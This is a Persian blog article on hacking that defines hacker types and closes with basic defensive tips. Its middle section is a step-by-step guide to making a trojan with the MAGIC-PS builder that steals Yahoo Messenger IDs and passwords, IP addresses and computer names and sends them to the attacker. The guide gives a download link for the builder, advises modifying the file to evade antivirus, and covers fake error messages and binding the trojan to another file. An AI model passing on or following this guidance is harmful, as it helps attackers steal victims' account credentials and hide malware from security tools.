تبلیغات
مجتمع آموزشی آزاد دانش - مقاله
 
 
كاربر گرامی، خوش آمدید!   WellCome To MyBlog
 
موضوعات سایت
بخش های سایت

جستجو


لوگو سایت

مجتمع آموزشی آزاد دانش


لوگوی دوستان

برترین سایت دانلود ایران

تبلیغات سایت




عنوان این پست مقاله و از بخش می باشد

چکیده :

به زبان ساده و شاید عامیانه ترین تعبیر آن دزدیده شدن كلمه عبور یك سیستم یا account می باشد. به طور كلی نفوذ به هر سیستم امنیتی كامپیوتری را hack می گویند.
Hacker
شخصی است باهوش , فرصت طلب , دارای معلومات بالا با افكار سازنده و مطمئنا با وجدان
.
لازم به ذكر است كه از نظر من هكرها با دزدان اینترنتی و یا الكترونیكی فرق دارند. هكرهای واقعی در میان خود پیمان نامه ای دارند كه همه پایبند به آن می باشند
.
هكر در موقع هك كردن یك سیستم امنیتی هدفش ضربه زدن (چه مادی و چه معنوی) به شخص یا اشخاصی نیست
.
او هك می كند تا معلوماتش را نشان دهد. هك می كند تا همگان بدانند كه سیستمهای امنیتی دارای مشكل هستند. هك می كنند تا نواقص (حفره های امنیتی ) این سیستمها نمایان شوند. اگر هكرها نمی بودند مطمئنا سیستمهای امنیتی به كاملی سیستمهای امروزی نمی بود. پس هكرها مفیدند
.
در این میان افرادی هستند كه با سوء استفاده از معلومات خود و یا دیگران هدفشان از هك كردن ضربه زدن به اشخاص است یا به دنبال پركردن جیب خود می باشند. از نظر من این افراد دزدانی بیش نیستند
.

بقیه موضوعات در ادامه مطلب

مقدمه:

شاید تا به حال برای شما اتفاق افتاده باشد كه مورد حمله هكرها (hackers) قرار بگیرید. شاید بارها اعتبار های اینترنتی تان در عرض یك روز خالی شده باشد بدون آنكه خودتان استفاده كرده باشید. شاید متوجه شده باشید كه در yahoo messenger شخص دیگری هم از ID شما استفاده می كند.  تمام این کارها همان کار هکرها می باشد برای اینکه بتوانیم با این اعمال مقابله کنیم می بایست هکرها و انواع هک و روش های هک کردن را بدانیم که  ما در این مبحث سعی می کنیم  به آن بپردازیم.

● هک Hack چیست؟

هر نوع نفوذ که توسط هکر در یک سیستم امینتی شبکه و کامپیوتری انجام گیرید به نوعی هک گفته می شود واژه‌ی هک به معنی نفوذ به سیستم‌های کامپیوتری و دسترسی غیرمجاز به سیستم‌ می‌باشد. به شخصی که این کار را انجام می‌دهد هکر گفته می‌شود. شاید در فیلم‌های سینمایی دیده باشید که نفوذ به یک سیستم کاری جذاب و همراه با عباراتی مانند Well Come. نشان داده می‌شود اما در واقع عملیات هک چنین نیست. نفوذ به یک سیستم کامپیوتری شامل عملیاتی طولانی و خسته‌کننده است و البته تجربه بالایی نیاز دارد.

● هکر Hacker کیست ؟
مفهوم هک همپای پیشرفت کامپیوتر همواره تغییر کرده است.
در ابتدا مفهوم هک استفاده از ابزارهای الکترونیکی و ارتباط نظیر تلفن جهت استفاده رایگان از آنها بود ک که بعدها توسط کارشناسان نرم افزاری جهت بدست آوردن کد و اطلاعات برنامه ها تغییر نمود و در حال حاضر هک به دستیابی غیر مجاز به اطلاعات یک کامپیوتر یا شبکه گفته می شود. با توجه به اینکه این کار غیر قانونی و گاهاً مخرب است ، هکرها به عنوان کاربران خطرناک و حتی پس از حملات ۱۱ سپتامبر بعنوان تروریست کامپیوتری مشهور شده اند.
در گذشته، تصور عمومی بر آن بود که هکرها بی آنکه قابل ردیابی باشند اطلاعات را به سرقت می بردند، این در حالی است که اگر از کارشناسان امنیت کامپیوتر در این موارد استفاده شود، می توانند نحوه هک شدن و نیز حتی فرد هکر را نیز شناسایی کنند.
هک میتواند جنبه شخصی یا حرفه ای داشته باشد، به عبارت دیگر، هکرها می توانند کلمات عبور یا اطلاعات شخصی یا شرکتی را به سرقت ببرند و یا در سطح بالاتری برای امنیت ملی خطراتی ایجاد کنند، مانند دخالت در امور ارتباطی و مالی و ... .
برخلاف تصوری که مردم از هکرها به عنوان افراد منزوی و ناراحت دارند، بسیاری از هکرها افراد باهوش و خلاق هستند و صرفاً بدلیل اغنای حس کار گروهی یا احساس قدرت اقدام به این کار می نمایند

هكرها را می توان بر اساس نوع فعالیت و دانش به پنج گروه طبقه بندی كرد كه عبارتند از :
هكرهای كلاه سفید
:
كه به آنها سامورایی یا هكرهای واقعی گفته می شود . هكرهای كلاه سفید
متخصصان كامپیوتر و آشنا به فناوری اطلاعات می باشند و هدفشان از نفوذ به سیستم های كامپیوتری كشف عیوب امنیتی در سیستم و بر طرف نمودن آنها است ، نه سوء استفاده . به عبارت ساده تر ، كلاه سفید ها برای این كار باید مانند هكرهای كلاه سیاه عمل كنند تا بتوانند ضعف های سیستم را كشف كنند
.

هكرهای كلاه سیاه :
به آنها واكر هم گفته می شود و از نظر كاری هكرهای كلاه سیاه دقیقاً برعكس هكر كلاه سفید عمل می نماید . به این معنی كه هدف آن ها نفوذ به سیستم ها و سوء استفاده از اطلاعات می باشد .
قفل بازكن یا كراكر
:
از نظر ماهیت كار این گروه از هكرها جزو گروه هكرهای كلاه سیاه می باشند . فعالیت این گروه از هكرها بیشتر در مورد نرم افزارها و سیستمهای كامپیوتری می باشد كه دارای قفل بوده و بصورت مجانی و یا اختصاصی مورد استفاده قرار می گیرد . 

Preaker :
از قدیمی ترین و در واقع هكرهای اولیه ای بودند كه برای كارشناسان نیاز به كامپیوتر نداشتند و بیشتر كارشان نفوذ به خطوط تلفن برای تماس مجانی ، استراق سمع و ... بود

هكرهای جوان ( Script Kiddies ) :
این گروه از هكرها با سایر گروه های هك تفاوت دارند و هكرهای جوان بر خلاف سایر هكرها كه ابزار و برنامه های مورد نیاز را خودشان می نویسند و برای هك از معلومات خود استفاده می كنند ، با استفاده از برنامه های خدماتی ویژه هك كه به وسیله دیگران نوشته شده است ( مانند Sub ۷ ) و به راحتی از طریق اینترنت و یا فروشگاه ها قابل تهیه می باشند ، به سیستم های كامپیوتری خسارت وارد می نمایند .

یک نمونه  از روش های هک کردن روش های بدست آوردن پسورد آی دی های یاهو

استفاده از تروجان :

کار اصلی تروجان ها فرستادن اطلاعات از کامپیوتر قربانی به سازنده خود است هکر ها نرم افزار هایی ر اطراحی کرده اند که با تنظیماتی که بروی آن ها انجام میدهیم یک فایل بسیار کم حجم را برای ما میسازد که وقتی این فایل بروی سیستم قربانی اجرا شد آن سیستم به تروجان آلود ه شود و هردفه به اینترنت وصل شد اطلاعات مشخص شده فرستاده شود . این اطلاعات به تنظیمات و قدرت برنامه ساخت تروجان بستگی دارد .

( MAGIC-PS ) : برای مثال به معرفی یک سازنده تروجان می پردازیم

نکته 1 : هیچ موقع بروی کامپیوتر خود اجرا نکنید .

نکته 2 : بدلیل قدیمی بودن این تروجان برای تعدادی از ویروس کش ها قابل شناسایی می باشد شما میتوانید با تغیرات در ساختار فایل از شناسایی آن جلوگیری کنید یا از تروجان های جدید استفاده کنید .

نکته 3 : این تروجان برای همه ورژن های یاهو مسنجر جواب میدهد.

نکته 4 : سازنده این تروجان را می توانید از آدرس . http://bafq.ir/mps.exe

دریافت کنید

اطلاعات مورد نیاز که می خواهیم : مانند آی دی و پسورد یاهو مسنجر ،  آدرس اینترنتی کامپیوتر ، نام کامپیوتر از قسمت  victim برایمان فرستاده می شود

طراحی یک : Fake Error messege قسمت پیام نمایشی بعد از اجرای تروجان

(: your yahoo id)در این قسمت باید آی دی خود را وارد کنید تا اطلاعات به آن فرستاده شود

: binder در این قسمت به شما اجازه میدهد تا قسمتی از فایلی را انتخاب کنید تا بعد از اجرای آن تروجان آن فایل اجرا شود.

choose icon :برای انتخاب یک شکلک :برای فایل تروجان تان .

mps:دراین قسمت نامی را برای تروجان :انتخاب میکنید .

و در آخر بروی کلید  create mps کلیک می کنید

● راه مقابله با هکرها
بهترین راه مقابله با هکرها بالا بردن امنیت سیستم های کامپیوتری می باشد . این کار ممکن است با تهیه سیستمهای نرم افزاری و سخت افزاری انجام شود . هیچ گاه به یک روش خاصی جهت حفظ امنیت اکتفا نکنید و نسخه جدید هر نرم افزار را تهیه کنید و دسترسی کاربران را به اطلاعات کنترل نمایید

نتیجه گیری :

در پایان  نتیجه  می گیریم  که  هک در اصل یکی از کارهای مفید برای شرکت های نرم افزار سازی می باشد که  با استفاده  از این روش می توان  به  نقاط ضعف نرم  افزارها دسترسی پیدا نموده  و آن ها را  تقویت کرد که  متاسفانه  از این امکان به  درستی استفاده  نمی شود و با  استفاده  از این  روش به  سود جویی و صدمه  رساندن به  دیگر نرم افزارهاو شرکت های نرم  افزاری می پردازند . حال می خواهیم پیشنهاد های را برای مقابله با هک نشدن  بیان کنیم .

1-    استفاده از دیواره آتش های جدید به روز (firewall)

2-     بازنکردن  سایت های نا آشنا و نامعتبر

3-    قبول نکردن پیام هایی که مطمئن نیستید فرستنده آن کیست.

4-    اجرا نکردن  برنامه های که به تائید شرکت های  معتبر نرسیده

5-    .بستن تمام پورت های باز سیستم خود

 :: لینك ثابت نویسنده : مجید دوجی نظرات و پیشنهادات Comment  

مطالب پیشین

اعلام نتایج
تعمیر رایانه شخصی
فتوشاپ
نقشه درجه 2
نقشه درجه 1
ویژوال
2
تقویم1
تقویم
دروس
نرخ شهریه آموزشگاهها
مدارك
مقاله


اطلاعات سایت
 

مدیران و نویسندگان
مجید دوجی

آمار بازدیدكنندگان
امروز :
دیروز :
كل :

مطالب و نظرات
كل مطالب :
كل نظر ها :


لینكدونی
آرشیو لینكدونی

نظرسنجی

لینك دوستان

صفحه اصلی |  ارتبــــــــــــــاط با ما |  ایمیل |  طراح قالب |  صفحه خانگی



Powered By www.EbrahimOnline.ir | Email:Mr.Eshafiei@gmail.com